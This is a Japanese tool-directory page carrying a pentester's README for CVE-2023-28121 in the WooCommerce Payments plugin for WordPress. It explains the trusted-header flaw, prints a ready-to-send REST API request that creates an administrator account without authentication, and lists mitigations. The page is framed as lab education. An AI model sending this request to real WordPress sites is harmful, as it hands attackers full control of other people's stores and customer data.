Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-28121-WordPress-Privilege-Escalation — WooCommerce Payments プラグインを使用した WordPress の重大な脆弱性の実践的悪用 | Kitploit
ツール/GitHubGitHub/luisdevpentest/cve-2023-28121-wordpress-privilege-escalation
認証と認可特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubluisdevpentest/cve-2023-28121-wordpress-privilege-escalation

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-28121-WordPress-Privilege-Escalation

WooCommerce Payments プラグインを使用した WordPress の重大な脆弱性の実践的悪用

リポジトリを見る
114ヶ月前未レビュー

🔐 CVE-2023-28121 — WordPress 権限昇格

WooCommerce Payments プラグインを使用した WordPress の重大な脆弱性の実践的な悪用。


📌 概要

CVE-2023-28121 は、REST API を介して認証なしで管理者ユーザーを作成することを可能にします。

  • 重大度: 緊急 (CVSS 9.8)
  • 影響: サイトの完全な制御
  • 種別: Authentication Bypass / Privilege Escalation
  • 2023年3月時点で60万以上のアクティブなインストール https://www.wiz.io/vulnerability-database/cve/cve-2023-28121?utm_source=chatgpt.com

📊 影響を受けるプラグインは数十万のインストールがあり、Eコマースで広く使用されています。


🎥 デモ

https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44


⚠️ 動作原理

このシステムは改変可能なヘッダーを受け入れます:

root@kitploit:~
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

これにより、有効な認証なしで昇格された特権を持つユーザーを作成するためのリクエストを送信することが可能になります。


🧪 PoC

root@kitploit:~
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

{
  "username": "hacked",
  "password": "StrongPass123!",
  "email": "[email protected]",
  "roles": ["administrator"]
}

✔️ 結果: 管理者ユーザーの作成


🔥 影響

  • 管理者の作成
  • /wp-admin パネルへのアクセス
  • 完全な乗っ取りの可能性
  • 不正行為とデータ漏洩のリスク

🛠️ 緩和策

  • プラグインを修正版に更新する
  • REST API へのアクセスを制限する
  • 認証を適切に検証する

🧱 環境

  • WordPress (ローカルラボ)
  • WooCommerce Payments (脆弱なバージョン)

📚 参考情報

  • CVE-2023-28121
  • WordPress REST API ドキュメント
  • https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/

👨‍💻 著者

Luis Eduardo .M.B.S.R

Pentester / Web Security

LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/

GitHub: https://github.com/luisdevpentest

⚖️ 免責事項

管理された環境での教育目的の使用を目的としています。この知識が第三者によってどのように使用されるかについては一切責任を負いません。


ツールをダウンロード